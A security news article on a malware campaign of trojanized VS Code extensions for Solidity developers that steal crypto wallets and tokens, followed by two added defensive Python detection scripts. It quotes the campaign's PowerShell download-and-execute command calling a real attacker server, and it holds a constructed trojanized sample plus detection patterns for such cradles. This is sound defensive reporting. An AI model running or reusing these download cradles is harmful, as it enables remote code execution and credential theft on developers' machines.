A sophisticated campaign targeting Solidity developers has emerged, utilizing Visual Studio Code’s popularity and extension ecosystem as an attack vector.
Threat actors have deployed trojanized extensions that masquerade as developer utilities while secretly exfiltrating cryptocurrency wallet credentials and other sensitive information from victim systems.
These extensions are particularly dangerous as they target developers who often have access to valuable blockchain assets and infrastructure, making them high-value targets for cryptocurrency theft.
Three malicious extensions have been identified in the VS Code Marketplace: solaibot, among-eth, and blankebesxstnion.
These extensions claim to provide advanced features like syntax scanning and vulnerability detection for Solidity developers but conceal harmful code behind genuine functionality.
Though removed from the Marketplace, the extensions were downloaded approximately 50 times before detection, potentially compromising numerous development environments and cryptocurrency wallets.
Datadog Security Labs researchers identified the threat actor behind this campaign, tracking them as MUT-9332 (Mysterious Unattributed Threat).
The security team discovered that this same threat actor was previously responsible for a separate campaign distributing a Monero cryptominer via backdoored VS Code extensions, which had reportedly reached up to one million downloads.
The malicious extensions exploit the generous permissions granted to VS Code extensions, which can read code and environment variables, register commands, modify configurations, and execute system commands as the current user.
This creates an ideal environment for infiltration, as developers often install extensions with minimal scrutiny, trusting the Marketplace’s automated security scanning to filter out malicious content.
What makes these extensions particularly effective is their dual nature: they provide real functionality relevant to Solidity developers while simultaneously executing their malicious payload chain, which keeps them from raising suspicion while they operate on the victim's system.
The infection mechanism employed by these extensions demonstrates remarkable complexity, using multiple stages of obfuscation and evasion techniques.
The initial attack begins in the extension.js file, which contains legitimate Solidity utilities but also hides malicious code that communicates with a command and control server at solidity[.]bot.
When the extension runs on a Windows system, the server responds with what looks like an innocuous version check but is in fact the first-stage payload:
powershell -ExecutionPolicy Bypass -Command "irm https://solidity[.]bot/a.txt | iex"
This command downloads and executes a PowerShell script that installs a malicious browser extension (extension.zip) into Chromium-based browsers. The script modifies browser shortcuts to load this extension at startup by appending the parameter:
--load-extension="$env:APPDATA\CheckExtension"
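The two host-side artifacts described above (a PowerShell download cradle embedded in an extension's JavaScript, and a browser shortcut whose arguments were extended with --load-extension) are both things a defender can look for on a developer workstation. The following Python script is an example added here, not Datadog's tooling or code from the extensions themselves. The detection patterns and the sample inputs are constructed for illustration; the placeholder URL example.invalid and the user path in the sample shortcut arguments are assumptions, not values from the article.

```python
"""Example host checks for trojanized VS Code extensions (added example, constructed inputs)."""
import re
from pathlib import Path

# Hypothetical detection rules for extension JavaScript: a PowerShell download
# cradle (irm/iwr piped into iex), an execution-policy bypass, and process spawning.
SUSPICIOUS_JS_PATTERNS = [
    (r"ExecutionPolicy\s+Bypass", "PowerShell execution-policy bypass"),
    (r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b[^|\n]*\|\s*iex\b",
     "download-and-execute cradle (irm/iwr piped to iex)"),
    (r"child_process", "extension spawns OS processes"),
]

# --load-extension=<path> or --load-extension <path>, quoted or bare.
LOAD_EXT_RE = re.compile(r'--load-extension(?:=|\s+)("[^"]*"|\S+)', re.IGNORECASE)


def scan_extension_source(js_text):
    """Return the labels of every suspicious pattern found in an extension's JS."""
    return [label for pattern, label in SUSPICIOUS_JS_PATTERNS
            if re.search(pattern, js_text, re.IGNORECASE)]


def scan_extension_dir(root):
    """Walk an extensions directory (e.g. ~/.vscode/extensions) and report hits per .js file."""
    hits = {}
    for js_file in Path(root).rglob("*.js"):
        try:
            findings = scan_extension_source(js_file.read_text(errors="ignore"))
        except OSError:
            continue
        if findings:
            hits[str(js_file)] = findings
    return hits


def check_shortcut_arguments(arguments):
    """Return the path a browser shortcut side-loads via --load-extension, or None."""
    match = LOAD_EXT_RE.search(arguments)
    return match.group(1).strip('"') if match else None


# Constructed sample inputs (not real extension code or real shortcuts).
BENIGN_JS = """
const vscode = require('vscode');
function activate(context) {
  context.subscriptions.push(vscode.commands.registerCommand('sol.lint', lint));
}
"""

TROJANIZED_JS = """
const { exec } = require('child_process');
function activate(context) {
  exec('powershell -ExecutionPolicy Bypass -Command "irm https://example.invalid/a.txt | iex"');
}
"""

BENIGN_SHORTCUT_ARGS = '--profile-directory="Default"'
MODIFIED_SHORTCUT_ARGS = r'--profile-directory="Default" --load-extension="C:\Users\dev\AppData\Roaming\CheckExtension"'

if __name__ == "__main__":
    print("benign extension:", scan_extension_source(BENIGN_JS))
    print("trojanized extension:", scan_extension_source(TROJANIZED_JS))
    print("benign shortcut:", check_shortcut_arguments(BENIGN_SHORTCUT_ARGS))
    print("modified shortcut:", check_shortcut_arguments(MODIFIED_SHORTCUT_ARGS))
    # On a real workstation, point this at the VS Code extensions directory:
    # print(scan_extension_dir(Path.home() / ".vscode" / "extensions"))
```

On Windows the shortcut arguments would be read from each Chromium-based browser's .lnk file (for example through the WScript.Shell COM object in PowerShell) and passed to check_shortcut_arguments; any side-loaded extension directory under the user's profile deserves a look, since legitimate installs do not need that flag.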
The infection chain then branches into multiple paths, displaying redundancy to ensure successful payload delivery and evade detection.
One path leads to myau.exe, which establishes persistence by adding registry keys and disabling Windows Defender.
It also employs an anti-forensic technique that crashes the system if the malware process is terminated.
Perhaps most creative is the use of steganography-like techniques, where one payload retrieves an image file (new_image.jpg) from the Internet Archive containing Base64-encoded malware.
While not true steganography, this technique helps bypass security controls that might not inspect image files for malicious code.
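Because the image-carried payload is plain Base64 rather than true steganography, a simple content check can catch it. The script below is an example added here, not Datadog's code or the malware's; it assumes the Base64 text is appended after the JPEG end-of-image marker, which is a common way such payloads are carried but is not something the article specifies. The sample "image" bytes and the embedded text are constructed for the example.

```python
"""Example check for Base64 text riding behind a JPEG's end-of-image marker (added example)."""
import base64
import re

JPEG_SOI = b"\xff\xd8"   # start of image
JPEG_EOI = b"\xff\xd9"   # end of image; a well-formed file ends here
B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")


def trailing_bytes(data):
    """Return whatever follows the last EOI marker (empty for a clean file)."""
    if not data.startswith(JPEG_SOI):
        raise ValueError("not a JPEG: missing SOI marker")
    eoi = data.rfind(JPEG_EOI)
    if eoi < 0:
        raise ValueError("truncated JPEG: missing EOI marker")
    # Base64 text never contains 0xFF, so the last EOI is the image's own marker
    # whenever the appended payload is Base64 (the case this example assumes).
    return data[eoi + len(JPEG_EOI):]


def decode_if_base64(blob):
    """Decode blob if it is a Base64 block (line wrapping tolerated), else None."""
    compact = b"".join(blob.split())
    if len(compact) < 16 or len(compact) % 4 or not B64_RE.match(compact):
        return None
    try:
        return base64.b64decode(compact, validate=True)
    except ValueError:      # binascii.Error is a ValueError subclass
        return None


def hidden_payload(data):
    """Return the decoded payload hidden after the image, or None if there is none."""
    extra = trailing_bytes(data)
    return decode_if_base64(extra) if extra else None


# Constructed sample: a JPEG-shaped byte string (not a decodable picture) with
# and without a Base64 block appended after EOI.
CLEAN_SAMPLE = JPEG_SOI + b"\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32 + JPEG_EOI
SAMPLE_TEXT = b"constructed sample text standing in for the payload"
STEGO_SAMPLE = CLEAN_SAMPLE + b"\n" + base64.b64encode(SAMPLE_TEXT) + b"\n"

if __name__ == "__main__":
    print("clean file trailing bytes:", len(trailing_bytes(CLEAN_SAMPLE)))
    print("hidden payload:", hidden_payload(STEGO_SAMPLE))
```

Run against a real file with `hidden_payload(open(path, "rb").read())`; a non-empty result from trailing_bytes that does not decode as Base64 is still worth inspecting, since a payload may be packed differently.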
The ultimate goal of this elaborate infection chain is credential theft, with the malware targeting cryptocurrency wallets, browser data, and Discord tokens before exfiltrating them to attacker infrastructure at m-vn[.]ws/bird.php.